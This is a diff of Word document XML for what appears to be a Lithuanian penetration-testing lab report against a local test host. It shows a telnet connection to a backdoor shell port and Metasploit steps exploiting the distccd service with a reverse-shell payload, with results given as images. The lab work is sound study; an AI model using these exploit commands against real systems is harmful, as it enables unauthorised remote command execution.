+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>telnet 192.168.177.128 1524</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A833F3B" wp14:editId="581D9F23">
+                  <wp:extent cx="2476500" cy="809625"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                  <wp:docPr id="29" name="Picture 29"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId25"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2476500" cy="809625"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2953" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>id</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6497" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC845AF" wp14:editId="01260F83">
+                  <wp:extent cx="3038475" cy="342900"/>
+                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                  <wp:docPr id="30" name="Picture 30"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId26"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3038475" cy="342900"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Be žalingų Backdoors yra ir paslaugos kurie pagal savo prigimtį yra pažeidžiami. Pirmasis iš jų yra įdiegtas IP - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>distccd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>. Ši programa leidžia lengvai paskirstyti didelį kompiliatoriaus darbą įvairiose sistemos. Šios paslaugos problema yra ta, kad hakeris gali lengvai piktnaudžiauti ją, paleisti komandas su atitinkamais pasirinkimas (raktais).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">root@linux:~# </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>use exploit/unix/misc/distcc_exec</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf  exploit(distcc_exec) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>set RHOST IP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">msf  exploit(distcc_exec) &gt; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="lt-LT"/>
+        </w:rPr>
+        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblInd w:w="1" w:type="dxa"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3420"/>
+        <w:gridCol w:w="6030"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="368"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Atliktas veiksmas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>msfconsole</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="033464BD" wp14:editId="45E05333">
+                  <wp:extent cx="3524652" cy="3152775"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="36" name="Picture 36"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId27"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3574538" cy="3197397"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>Use</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>exploit/unix/misc/distcc_exec</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="021589C8" wp14:editId="0F537C73">
+                  <wp:extent cx="3124200" cy="171450"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="35" name="Picture 35"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId28"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3124200" cy="171450"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="327"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>set RHOST 192.168.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>177</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>.1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>28</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58313608" wp14:editId="72F2BDA0">
+                  <wp:extent cx="3827780" cy="252095"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="34" name="Picture 34"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -10674,7 +10544,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="2581275" cy="866775"/>
+                            <a:ext cx="3827780" cy="252095"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -10695,61 +10565,59 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="2953" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            <w:tcW w:w="3420" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>id;</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6497" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+              <w:t>set payload cmd/unix/reverse</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6030" w:type="dxa"/>
+            <w:tcBorders>
+              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
               <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
+              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
+            </w:tcBorders>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="BodyText"/>
+              <w:spacing w:after="0"/>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="lt-LT"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:noProof/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41107276" wp14:editId="2F03E033">
-                  <wp:extent cx="1857375" cy="504825"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
-                  <wp:docPr id="24" name="Picture 24"/>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F2E33B" wp14:editId="0E0432C4">
+                  <wp:extent cx="3827780" cy="212090"/>
+                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
+                  <wp:docPr id="33" name="Picture 33"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -10769,7 +10637,7 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="1857375" cy="504825"/>
+                            <a:ext cx="3827780" cy="212090"/>
                           </a:xfrm>
                           <a:prstGeom prst="rect">
                             <a:avLst/>
@@ -10784,171 +10652,95 @@
           </w:p>
         </w:tc>
       </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:lang w:val="lt-LT"/>
-        </w:rPr>
